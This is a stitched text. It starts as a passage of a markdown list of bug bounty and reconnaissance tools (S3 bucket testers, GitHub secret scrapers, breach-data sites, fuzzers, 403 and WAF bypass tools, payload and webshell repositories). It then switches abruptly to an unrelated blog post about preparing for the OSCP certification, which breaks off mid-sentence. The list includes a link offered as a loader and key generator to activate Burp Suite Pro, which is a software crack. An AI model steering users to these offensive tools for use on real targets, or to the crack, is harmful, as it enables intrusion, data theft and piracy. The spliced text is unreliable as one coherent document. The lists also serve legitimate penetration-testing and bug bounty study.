[mass-s3-bucket-tester](https://github.com/random-robbie/mass-s3-bucket-tester) - This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable - [S3BucketList](https://github.com/AlecBlance/S3BucketList) - Firefox plugin that lists Amazon S3 Buckets found in requests - [dirlstr](https://github.com/cybercdh/dirlstr) - Finds Directory Listings or open S3 buckets from a list of URLs - [Burp-AnonymousCloud](https://github.com/codewatchorg/Burp-AnonymousCloud) - Burp extension that performs a passive scan to identify cloud buckets and then test them for publicly accessible vulnerabilities - [kicks3](https://github.com/abuvanth/kicks3) - S3 bucket finder from html,js and bucket misconfiguration testing tool - [2tearsinabucket](https://github.com/Revenant40/2tearsinabucket) - Enumerate s3 buckets for a specific target. - [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files. - [s3tk](https://github.com/ankane/s3tk) - A security toolkit for Amazon S3 - [CloudBrute](https://github.com/0xsha/CloudBrute) - Awesome cloud enumerator - [s3cario](https://github.com/0xspade/s3cario) - This tool will get the CNAME first if it's a valid Amazon s3 bucket and if it's not, it will try to check if the domain is a bucket name. - [S3Cruze](https://github.com/JR0ch17/S3Cruze) - All-in-one AWS S3 bucket tool for pentesters. ### github-secrets - [githacker](https://github.com/WangYihang/GitHacker) - [git-hound](https://github.com/tillson/git-hound) - [gh-dork](https://github.com/molly/gh-dork) - Github dorking tool - [gitdorker](https://github.com/obheda12/GitDorker) - A Python program to scrape secrets from GitHub through usage of a large repository of dorks. - [github-endpoints](https://github.com/gwen001/github-endpoints) - [git-secrets](https://github.com/awslabs/git-secrets) - Prevents you from committing secrets and credentials into git repositories - [gitleaks](https://github.com/zricethezav/gitleaks) - Scan git repos (or files) for secrets using regex and entropy - [truffleHog](https://github.com/dxa4481/truffleHog) - Searches through git repositories for high entropy strings and secrets, digging deep into commit history - [gitGraber](https://github.com/hisxo/gitGraber) - gitGraber: monitor GitHub to search and find sensitive data in real time for different online services - [talisman](https://github.com/thoughtworks/talisman) - By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys. - [GitGot](https://github.com/BishopFox/GitGot) - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets. - [git-all-secrets](https://github.com/anshumanbh/git-all-secrets) - A tool to capture all the git secrets by leveraging multiple open source git searching tools - [github-search](https://github.com/gwen001/github-search) - Tools to perform basic search on GitHub. - [git-vuln-finder](https://github.com/cve-search/git-vuln-finder) - Finding potential software vulnerabilities from git commit messages - [commit-stream](https://github.com/x1sec/commit-stream) - #OSINT tool for finding Github repositories by extracting commit logs in real time from the Github event API - [gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations - [repo-supervisor](https://github.com/auth0/repo-supervisor) - Scan your code for security misconfiguration, search for passwords and secrets. - [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github - [shhgit](https://github.com/eth0izzle/shhgit) - Ah shhgit! Find GitHub secrets in real time - [detect-secrets](https://github.com/Yelp/detect-secrets) - An enterprise friendly way of detecting and preventing secrets in code. - [rusty-hog](https://github.com/newrelic/rusty-hog) - A suite of secret scanners built in Rust for performance. Based on TruffleHog - [whispers](https://github.com/Skyscanner/whispers) - Identify hardcoded secrets and dangerous behaviours - [yar](https://github.com/nielsing/yar) - Yar is a tool for plunderin' organizations, users and/or repositories. - [dufflebag](https://github.com/BishopFox/dufflebag) - Search exposed EBS volumes for secrets - [secret-bridge](https://github.com/duo-labs/secret-bridge) - Monitors Github for leaked secrets - [earlybird](https://github.com/americanexpress/earlybird) - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more. > GitHub dork wordlist - [dork list](https://gist.githubusercontent.com/EdOverflow/8bd2faad513626c413b8fc6e9d955669/raw/06a0ef0fd83920d513c65767aae258ecf8382bdf/gistfile1.txt) - [github-dorks](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt) > Git - [GitTools](https://github.com/internetwache/GitTools) - A repository with 3 tools for pwn'ing websites with .git repositories available - [gitjacker](https://github.com/liamg/gitjacker) - Leak git repositories from misconfigured websites - [git-dumper](https://github.com/arthaud/git-dumper) - A tool to dump a git repository from a website - [GitHunter](https://github.com/digininja/GitHunter) - A tool for searching a Git repository for interesting content - [dvcs-ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG... ### email-hunting - [GHunt](https://github.com/mxrch/GHunt) - 🕵️‍♂️ Investigate Google emails and documents. - [infoga](https://github.com/m4ll0k/infoga) - Infoga - Email OSINT - [reconspider](https://github.com/bhavsec/reconspider) - 🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations. - [theHarvester](https://github.com/laramies/theHarvester) - E-mails, subdomains and names Harvester - OSINT - [hunter](https://hunter.io/) - [phonebook](https://phonebook.cz/) - [voilanorbert](https://www.voilanorbert.com/) - [verifyemailaddress](https://tools.verifyemailaddress.io/) - [email-checker](https://email-checker.net/) - [Clearbit-Connect](https://chrome.google.com/webstore/detail/clearbit-connect-supercha/pmnhcgfcafcnkbengdcanjablaabjplo?hl=en) ### data-breach - [pwndb](https://github.com/davidtavarez/pwndb/) - [breach-parse](https://github.com/hmaverickadams/breach-parse) - [dehashed](https://dehashed.com/) - [weleakinfo](https://weleakinfo.to/) - [leakcheck](https://leakcheck.io/) - [sunbase](https://snusbase.com/) - [intelx](https://intelx.io/) - [haveibeenpwned](https://haveibeenpwned.com/) - [scatteredsecrets](https://scatteredsecrets.com/) ### web-wayback - [waymore](https://github.com/xnl-h4ck3r/waymore) - Find way more from the Wayback Machine! - [sigurlfind3r](https://github.com/signedsecurity/sigurlfind3r) - A passive reconnaissance tool for known URLs discovery - it gathers a list of URLs passively using various online sources - [waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain - [gau](https://github.com/lc/gau) - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. - [gauplus](https://github.com/bp0lr/gauplus) - A modified version of gau - [waybackpy](https://github.com/akamhy/waybackpy) - Wayback Machine API Python interfaces and CLI tool. - [chronos](https://github.com/mhmdiaa/chronos) - Extract pieces of info from a web page's Wayback Machine history > Replace parameter value - [bhedak](https://github.com/R0X4R/bhedak) - A replacement of "qsreplace", accepts URLs as standard input, replaces all query string values with user-supplied values and stdout. > Find reflected params - [gxss](https://github.com/KathanP19/Gxss) - A tool to check a bunch of URLs that contain reflecting params. - [freq](https://github.com/takshal/freq) - This is go CLI tool for send fast Multiple get HTTP request. - [bxss](https://github.com/ethicalhackingplayground/bxss/) - A Blind XSS Injector tool > Find js file from waybackurls.txt - [subjs](https://github.com/lc/subjs) > Automatic put parameter value - [qsreplace](https://github.com/tomnomnom/qsreplace) - [url dedupe](https://github.com/ameenmaali/urldedupe) > Declutters url lists - [uro](https://github.com/s0md3v/uro) ### ports-scanning - [masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. - [RustScan](https://github.com/RustScan/RustScan) - The Modern Port Scanner - [naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity. - [nmap](https://github.com/nmap/nmap) - Nmap - the Network Mapper. Github mirror of official SVN repository. - [sandmap](https://github.com/trimstray/sandmap) - Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles. - [ScanCannon](https://github.com/johnnyxmas/ScanCannon) - Combines the speed of masscan with the reliability and detailed enumeration of nmap - [unimap](https://github.com/Edu4rdSHL/unimap) > Brute-Forcing from Nmap output - [brutespray](https://github.com/x90skysn3k/brutespray) ### waf - [wafw00f](https://github.com/enablesecurity/wafw00f) - [cf-check](https://github.com/dwisiswant0/cf-check) - [w3af](https://github.com/andresriancho/w3af) - w3af: web application attack and audit framework, the open source web vulnerability scanner. > Waf bypass - [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters. - [CloudFail](https://github.com/m0rtem/CloudFail) - Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network ### directory-search - [gobuster](https://github.com/OJ/gobuster) - Directory/File, DNS and VHost busting tool written in Go - [recursebuster](https://github.com/C-Sto/recursebuster) - rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments - [feroxbuster](https://github.com/epi052/feroxbuster) - A fast, simple, recursive content discovery tool written in Rust. - [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner - [dirsearch](https://github.com/evilsocket/dirsearch) - A Go implementation of dirsearch. - [filebuster](https://github.com/henshin/filebuster) - An extremely fast and flexible web fuzzer - [dirstalk](https://github.com/stefanoj3/dirstalk) - Modern alternative to dirbuster/dirb - [dirbuster-ng](https://github.com/digination/dirbuster-ng) - dirbuster-ng is C CLI implementation of the Java dirbuster tool - [gospider](https://github.com/jaeles-project/gospider) - Gospider - Fast web spider written in Go - [hakrawler](https://github.com/hakluke/hakrawler) - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application > Fuzzing - [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go - [wfuzz](https://github.com/xmendez/wfuzz) - Web application fuzzer - [fuzzdb](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. - [IntruderPayloads](https://github.com/1N3/IntruderPayloads) - A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists. - [fuzz.txt](https://github.com/Bo0oM/fuzz.txt) - Potentially dangerous files - [fuzzilli](https://github.com/googleprojectzero/fuzzilli) - A JavaScript Engine Fuzzer - [fuzzapi](https://github.com/Fuzzapi/fuzzapi) - Fuzzapi is a tool used for REST API pentesting and uses API_Fuzzer gem - [qsfuzz](https://github.com/ameenmaali/qsfuzz) - qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities. ### hidden-file-or-directory > 18-03-22 - [relative-url-extractor](https://github.com/jobertabma/relative-url-extractor) - A small tool that extracts relative URLs from a file. - [virtual-host-discovery](https://github.com/jobertabma/virtual-host-discovery) - A script to enumerate virtual hosts on a server. > JS - [linx](https://github.com/riza/linx) - Reveals invisible links within JavaScript files - [diffJs](https://github.com/CaptainFreak/diffJs) - Tool for monitoring changes in javascript files on WebApps for reconnaissance. - [scripthunter](https://github.com/robre/scripthunter) - Tool to find JavaScript files on Websites > Metadata - [exiftool](https://github.com/exiftool/exiftool) - ExifTool meta information reader/writer - [earlybird](https://github.com/americanexpress/earlybird) - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more. - [DumpsterDiver](https://github.com/securing/DumpsterDiver) - Tool to search secrets in various filetypes. - [ChopChop](https://github.com/michelin/ChopChop) - ChopChop is a CLI to help developers scanning endpoints and identifying exposition of sensitive services/files/folders. - [gospider](https://github.com/jaeles-project/gospider) - Fast web spider written in Go - [gobuster](https://github.com/OJ/gobuster) - Directory/File, DNS and VHost busting tool written in Go - [janusec](https://github.com/Janusec/janusec) - [source leak hacker](https://github.com/WangYihang/SourceLeakHacker) - [favfreak](https://github.com/devanshbatham/FavFreak) - [jwsxploiter](https://github.com/DontPanicO/jwtXploiter) - A tool to test security of json web token - [bfac](https://github.com/mazen160/bfac) - BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. - [jsearch](https://github.com/d3ftx/jsearch) - [linkfinder](https://github.com/GerbenJavado/LinkFinder) - A python script that finds endpoints in JavaScript files - [secretfinder](https://github.com/m4ll0k/SecretFinder) - A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript files - [jsa](https://github.com/w9w/JSA) - [JSParser](https://github.com/nahamsec/JSParser) - A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting. > Broken link - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) - Find broken links, missing images, etc within your HTML. - [brokenlinkhijacker](https://github.com/MayankPandey01/BrokenLinkHijacker) - A Fast Broken Link Hijacker Tool written in Python ### parameter-finder - [paramspider](https://github.com/devanshbatham/ParamSpider) - Mining parameters from dark corners of Web Archives - [parameth](https://github.com/maK-/parameth) - This tool can be used to brute discover GET and POST parameters - [param-miner](https://github.com/PortSwigger/param-miner) - This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. - [ParamPamPam](https://github.com/Bo0oM/ParamPamPam) - This tool for brute discover GET and POST parameters. - [Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite. > Dlelte Duplicate from waybacks - [dpfilter](https://github.com/Abdulrahman-Kamel/dpfilter) - BugBounty , sort and delete duplicates param value without missing original value ### bypass-forbidder-directory - [dirdar](https://github.com/M4DM0e/DirDar) - DirDar is a tool that searches for (403-Forbidden) directories to break it and get dir listing on it - [4-ZERO-3](https://github.com/Dheerajmadhukar/4-ZERO-3) - 403/401 Bypass Methods - [byp4xx](https://github.com/lobuhi/byp4xx) - Pyhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents. - [403bypasser](https://github.com/yunemse48/403bypasser) - 403bypasser automates techniques used to bypass access control restrictions on target pages. This tool will continue to be developed, contributions are welcome. ### wordlists-payloads - [bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things. - [CheatSheetSeries](https://github.com/OWASP/CheatSheetSeries) - The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. - [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) - A repository that includes all the important wordlists used while bug hunting. - [seclists](https://github.com/danielmiessler/SecLists) - SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. - [Payload Box](https://github.com/payloadbox) - Attack payloads only 📦 - [awesome-wordlists](https://github.com/gmelodie/awesome-wordlists) - A curated list wordlists for bruteforcing and fuzzing - [Fuzzing-wordlist](https://gowthams.gitbook.io/bughunter-handbook/fuzzing-wordlists) - fuzzing-wordlists - [Web-Attack-Cheat-Sheet](https://github.com/riramar/Web-Attack-Cheat-Sheet) - Web Attack Cheat Sheet - [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings) - A list of useful payloads and bypass for Web Application Security and Pentest/CT - [pentestmonkey](http://pentestmonkey.net/) - Taking the monkey work out of pentesting - STOK suggest - [assetnote](https://wordlists.assetnote.io/) - [SecUtils](https://github.com/BonJarber/SecUtils) - Random utilities from my security projects that might be useful to others - [jhaddix](https://gist.github.com/jhaddix) - [samlists](https://github.com/the-xentropy/samlists) - [fuzz](https://github.com/Bo0oM/fuzz.txt) - [webshell](https://github.com/tennc/webshell) - This is a webshell open source project - [OneListForAll](https://github.com/six2dez/OneListForAll) - Rockyou for web fuzzing - [bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things. - [english-words](https://github.com/dwyl/english-words) - 📝 A text file containing 479k English words for all your dictionary/word-based projects e.g: auto-completion / autosuggestion > Exceptional - [Web-Sec-CheatSheet](https://github.com/imran-parray/Web-Sec-CheatSheet) - [wordlists](https://github.com/assetnote/wordlists) - Automated & Manual Wordlists provided by Assetnote - [fuzzdb](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. - [WordList](https://github.com/orwagodfather/WordList) - [Commodity-Injection-Signatures](https://github.com/xsscx/Commodity-Injection-Signatures) - Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT ### miscellaneous - [hack-tools](https://github.com/edoardottt/lit-bb-hack-tools) - [httpmethods](https://github.com/ShutdownRepo/httpmethods) - HTTP verb tampering & methods enumeration - [awesome oscp](https://github.com/0x4D31/awesome-oscp) - [maltego](https://www.maltego.com/) - [owtf](https://github.com/owtf/owtf) - [site broker](https://github.com/Anon-Exploiter/SiteBroker) - [explo](https://github.com/telekom-security/explo) - [big bounty](https://github.com/Viralmaniar/BigBountyRecon) - [awesome bug bounty tools](https://github.com/vavkamil/awesome-bugbounty-tools) - [awesome web hacking](https://github.com/infoslack/awesome-web-hacking) - [awesome open source](https://awesomeopensource.com/) - [cerbrutus](https://github.com/Cerbrutus-BruteForcer/cerbrutus) - [radamsa](https://gitlab.com/akihe/radamsa) - [reconmaster](https://github.com/YouGina/reconmaster/) - [unicode-converter](https://www.branah.com/unicode-converter) - Unicode Converter Decimal, text, URL, and unicode converter - [breport](https://buer.haus/breport/) - Bounty report genarator - [hackerone 100 tools](https://www.hackerone.com/ethical-hacker/100-hacking-tools-and-resources) - Hackerone 100 tools for hacker - [Nmap-For-Pentester](https://github.com/Ignitetechnologies/Nmap-For-Pentester) - hunt the vulnerabilties with "Nmap". ### social-engineering - [social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) - The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. > Uncategorized - [JSONBee](https://github.com/zigoo0/JSONBee) - A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites. - [CyberChef](https://github.com/gchq/CyberChef) - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis - [bountyplz](https://github.com/fransr/bountyplz) - Automated security reporting from markdown templates (HackerOne and Bugcrowd are currently the platforms supported) - [awesome-vulnerable-apps](https://github.com/vavkamil/awesome-vulnerable-apps) - Awesome Vulnerable Applications - [XFFenum](https://github.com/vavkamil/XFFenum) - X-Forwarded-For [403 forbidden] enumeration ### scripts - [awesome-bughunting-oneliners](https://github.com/devanshbatham/awesome-bughunting-oneliners) - A list of Awesome Bughunting oneliners , collected from the various sources - [awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) - A collection of awesome one-liner scripts especially for bug bounty tips. - [bbtips](https://github.com/punishell/bbtips) - BugBountyTips - [oneliner-bugbounty](https://github.com/twseptian/oneliner-bugbounty) - oneliner commands for bug bounties - [One-Liner-Scripts](https://github.com/litt1eb0yy/One-Liner-Scripts) - A collection of awesome one-liner scripts for bug bounty hunting. ------------------------ -------------------- ### API_key - [keyhacks](https://github.com/streaak/keyhacks) - Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. - [gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) - Used for determining whether a leaked/found Google Maps API Key is vulnerable to unauthorized access by other applications or not. ---------------------------- ------------------------------ ### Code_review - [phpvuln](https://github.com/ecriminal/phpvuln) - 🕸️ Audit tool to find common vulnerabilities in PHP source code -------------------------- ----------------------------- ### log-file-analyze - [Dialog](https://github.com/SxNade/DiaLog) ### programs - [disclose](https://github.com/disclose) -Open-source vulnerability disclosure and bug bounty program database. - [bug bounty dork](https://github.com/sushiwushi/bug-bounty-dorks) - List of Google Dorks for sites that have responsible disclosure program / bug bounty program - [crunchbase](https://www.crunchbase.com/) - Discover innovative companies and the people behind them - [bounty-targets-data](https://github.com/arkadiyt/bounty-targets-data) - This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports - [Vdps_are_love](https://github.com/darshanjogi/Vdps_are_love) - This repo is made for those hunters who love to hunt on VDP programs. List of Vdp programs which are not affiliated with known bug bounty platforms such as HackerOne or Bugcrowd. - [chaos](https://chaos.projectdiscovery.io/#/) - We actively collect and maintain internet-wide assets' data, this project is meant to enhance research and analyse changes around DNS for better insights. - [bug-bounty-list](https://www.bugcrowd.com/bug-bounty-list/) - The most comprehensive, up to date crowdsourced list of bug bounty and security vulnerability disclosure programs from across the web curated by the hacker community. ### burp-suite-extesion - [Active scan ++]() - [Content Type Converter]() - [Param miner]() - [Logger ++]() - [Turbo intruder]() - [Upload scanner]() - [Reflected parameters]() - [Collaborator everywhere]() - [Backslash powered scanner]() - [Software version Reporter]() - [Software vulnerability scanner]() - [Autorize]() - [HTTP request smuggler]() - [Flow]() - [Hunt]() - [Burp Bounty]() - [Taborator]() - [Add custom header]() - [command injection attacker]() - [BurpSuite-Xkeys](https://github.com/vsec7/BurpSuite-Xkeys) - A Burp Suite Extension to extract interesting strings (key, secret, token, or etc.) from a webpage. - [Admin-Panel_Finder](https://github.com/moeinfatehi/Admin-Panel_Finder) - A burp suite extension that enumerates infrastructure and application admin interfaces (OTG-CONFIG-005) - [x8-Burp](https://github.com/Impact-I/x8-Burp) - Hidden parameters discovery suite - [burp-extensions](https://github.com/xnl-h4ck3r/burp-extensions) - Burp Extensions - [inql](https://github.com/doyensec/inql) - InQL - A Burp Extension for GraphQL Security Testing - [ip-rotate](https://github.com/PortSwigger/ip-rotate) - Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request. - [saml-raider](https://github.com/portswigger/saml-raider) - SAML2 Burp Extension - [jwt-editor](https://github.com/portswigger/jwt-editor) - A Burp Suite extension and standalone application for creating and editing JSON Web Tokens. This tool supports signing and verification of JWS, encryption and decryption of JWE and automation of several well-known attacks against applications that consume JWT. - ``` Collaborator Everywhere XSS Validator Wsdler .NET Beautifier Bypass WAF J2EEScan Param Miner Wayback Machine JS Link Finder Upload Scanner Nucleus Burp Extension Software Vulnerability Scanner Active Scan++ ``` > Burp suite pro - [Burp-Suite](https://github.com/SNGWN/Burp-Suite) - || Activate Burp Suite Pro with Loader and Key-Generator || > Scope ```bash ^.+\.company\.com$ ^443$ ^/.* ``` ### DOS - [slowhttptest](https://github.com/shekyan/slowhttptest) - Application Layer DoS attack simulator ------------------------ ### Websocket - [STEWS](https://github.com/PalindromeLabs/STEWS) - A Security Tool for Enumerating WebSockets -------------------- -------------------------------------------------- ### Smart-Contract - [mythril](https://github.com/ConsenSys/mythril) - Security analysis tool for EVM bytecode. Supports smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains. <p align="right">(<a href="#top">back to top</a>)</p>
# My OSCP Journey It seems to be a tradition to write a cheesy 🧀 blog post after you've earned your OSCP, here I am. TLDR: - Laughed at people calling it a 'journey' - Failed, reconsidered the whole 'journey' thing - Got more motivation from failing than ever before - Passed ## Background I'm a Software Engineer by trade, worked in companies large and small, worked with super old tech, and the shiny new stuff on the cloud, _serverless_ _typescript_ _functional programming_ and a bunch more buzzwords. As a naive 14 year old I always wanted to become a super l33t hax0r. Slightly forgot that dream for a while, but after 10 years in the Software Field I really needed some kind of change. Long story short, I stumbled on the OSCP and liked the concept a lot. A course that teaches you ethical hacking! Sounds fun! "Let's just try it, how hard can it be?" - I thought to myself and just went and purchased the PWK Course. ## Starting out I spent a while reading the PWK PDF and actually learned a lot more than I expected. There is a lot of fun stuff in there (Did you know [PowerShellEmpire](http://www.powershellempire.com/) let's you [Rick-Roll](https://www.youtube.com/watch?v=dQw4w9WgXcQ) people?). I also purchased a subscription to HackTheBox (which I liked primarily because you need to do a challenge to even create an account). Doing the starting path and easy boxes with a lot of watching [ippsec's videos](https://www.youtube.com/c/ippsec/videos) to understand the basics. This really helped me a ton in the beginning. I've heard a lot of good things about the rooms in TryHackMe as well, but personally I did not use this platform. Cracking some of the non-retired machines on HackTheBox (no writeups available for these) felt damn good! I only purchased 30 days of the PWK Lab time, which had almost ran out by the time I finished the PDF, so I only got the recommended starting point machines done, before the time ran out. Still highly recommend starting out with these in the lab, as they also mention which chapters are covered by these machines. After my lab time ran out, I've used [TJNulls list for OSCP-like boxes](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/) and did most of the HackTheBox ones. As I had the HackTheBox VIP subscription, I was able to look up writeups much more easily and could learn a lot from the masters. This also had the caveat, that it is easy to get into the habit of just looking up the solution once you get stuck (At least set yourself a timer to try for 2h+ before 'cheating', you'll learn much more like this.). ## First exam try Once I did most of the HackTheBox machines from the google sheet, I felt quite ready to take on the exam. I was able to do most easy/medium machines without looking up the solution in a reasonable amount of time. So I signed up, and also did some Vulnhub machines, the OSCP VulnApps buffer overflows to prepare for the 25pt Buffer Overflow machine in the lab. My exam was scheduled to start at 4 PM, I was so nervous that I slept really bad the night before and already felt sluggish. During the setup phase, you're expected to run a diagnostics script to verify your VPN connection. It had some issue with my DNS, so I needed to troubleshoot that. The proctors told me it looks like I was connecting from a datacenter. After turning off my Pi-Hole and proving to them that I was connected to a residential connection, I was even more nervous than before and already lost a good hour of exam time. I read a lot about strategies on what to tackle first, so I did what most people recommended: Doing the buffer overflow machine first and letting [AutoRecon](https://github.com/Tib3rius/AutoRecon) run in the background for all the other hosts. _Always be scanning is a good word of wisdom_ After struggling a bit to make the buffer overflow work on the target machine (needed to revert it before it would work), still extremely nervous, I set out to try my first 20 point machine. After about 20min I was pretty sure I found a vulnerability that would let me exploit it, none of my attempts seemed to actually work. It just would not budge. This is where I committed my next big mistake, I kept coming back to that damn 20 pointer, hopping between boxes as soon as I got another Idea. So I barely touched my 10 point machine or the other 20 pointer. I also didn't really take any breaks, I always felt like I was sooooo close! After switching to the 25 pointer, I found a vulnerability pretty fast, but exploiting it seemed impossible again, I tried a lot of techniques. Techniques that were way out of scope for the OSCP (that should've been an indication that I was on the wrong path). This viscous cycle continued for all the other boxes. I found the attack vector, but just could not follow through at all. Even the 10 pointer seemed like a cruel joke. After I slept a horrible 5 hours, already thinking to myself that I must've failed, I reemerged and tried a bunch of more stuff that I could think of. Still. Nothing. It was extremely frustrating. I had run out of ideas on what to try. I ran metasploit against one machine, but that did not help me at all. After calming down a bit and going on a walk, I still did not have any 💡 turning on in my head. I tried stuff until I watched the VPN close in front of my eyes. I knew I failed this time. ## Prep for second exam After recovering a bit and sleeping a lot, I actually expected to be devastated, but actually the opposite happened. My ass was handed to me, and somehow that inspired me more than ever. I was so excited about learning about CyberSec I could barely go to sleep, continuing reading https://reddit.com/r/netsec and hacker news in bed. It really sparked my interest more than I ever thought. So I re-purchased another Exam-Attempt and another 30 days of lab time. I built a spreadsheet and wanted to conquer at least 30 machines (on average 1 a day) during my lab time. ### What the labs made different to HTB In my opinion the labs are much more accurate in terms of real world machines. You get angry firewalls and AVs that you need to dodge, on HTB a lot of the time you are given 'quality of life' features like `nc` binaries with the `-e` option on the vulnerable hosts. Not so in the PWK labs, you'll need to try a bunch of different reverse shells for it to work. This is an invaluable resource: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md The machines also won't just allow any port, you need to find out which are open and then use those for your shells. The lab contains a few hidden gems like _possibly_ retired exam machines (the loot you find on those will indicate as such), so it's a much better approximation of what you will find in the exam. I also enjoyed the pivoting part immensely, gaining access to the 'hidden' departments really felt like being a real hacker. ![](https://i.kym-cdn.com/entries/icons/original/000/021/807/ig9OoyenpxqdCQyABmOQBZDI0duHk2QZZmWg2Hxd4ro.jpg) The infamous big 4 were also a nice challenge and I can definitely recommend them. ### Hacktricks Hacktricks has been one of the best resources I could find so far, it has tons of guides for grouped by port / type of exploitation / software etc. I can highly recommend it https://book.hacktricks.xyz/ ### Proving Grounds Practice Another platform I enjoyed using during my time was [Offsec's Proving Grounds Practice](https://www.offensive-security.com/labs/individual/) I think it is worth its $19 per month and gives you a wide variety of machines to exploit. Some gripes I had with this platform though were: - Writeups can only be accessed after working 1.5h on it, if you stop and continue the next day, this counter is reset. I understand the reasoning behind it, but I would definitely not recommend this platform for any kind of beginner that relies on writeups - Writeups can not be looked at, after rooting the machine and submitting the flags. This really bothered me, you have no way to learn what other methods of exploitation existed or if you used an unintended way of exploitation (i.e. Kernel exploit, if another vulnerability was intended) Proving ground practice also contained more up-to-date machines than the lab, so you'd get to experience vulnerabilities in more modern software. Exploiting the machines also gives you some kind of idea what Offsec considers to be easy, medium and hard boxes, which can be valuable in the exam. As a software engineer I noticed as soon as a machine requires you to read / write code the community considers it as 'Very Hard'. ### Udemy I also signed up the for excellent Privilege Escalation Courses on Udemy from Tib3rius. It will give you much more background on what LinPEAS and WinPEAS will output, which is nice to fill gaps in your knowledge. https://www.udemy.com/course/linux-privilege-escalation/ https://www.udemy.com/course/windows-privilege-escalation/ ## Getting help Something I kind of disliked in general was the 'Try Harder' mentality. I'd see beginners struggling to understand a concept and only getting the famous phrase thrown at them. Every time someone reached out to me, I really tried to make sure they understood the underlying concepts. It seems like a really discouraging way to handle teaching, I've never once met someone that was just looking for the solution, all of them just wanted to broaden their knowledge. You can't try harder, if you don't even know what to try. ### Infosec discord server ![](2021-04-18-14-00-38.png) One of the best resources for me was the [InfoSec Prep Discord Server](https://discord.gg/RRgKaep). It's filled with people with the same goal as you and they are very helpful. Even as an introvert I noticed a big jump in motivation working with other people on the same goal. ## What I would do differently than I did To get the most of the lab time, start with TryHackMe or other platforms more meant for teaching you the basics before signing up for the course. Still read the PDF you get, it's well written and was an enjoyable read. Don't focus on just one platform, I mostly only did HackTheBox, but boxes can be very similar. It's good to diversify a bit with VulnHub, HTB, TryHackMe etc. Hold off on Proving Grounds Practice until you already have a solid methodology built up. ## Second exam A few days before the actual exam, I chose a set of 4 machines from the Proving Grounds Practice (1x 10pt, 2x 20ptm 1x 25pt) as well as [dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood). I set myself a time limit of 24h to finish all of those. After 5h 19min I had gained access to all of them and felt more confident about my second attempt. After a month of additional preparation I felt much better about being able to tackle the exam. My exam was scheduled for 1PM, so I went for a long walk in the sunny spring weather to calm my nerves and 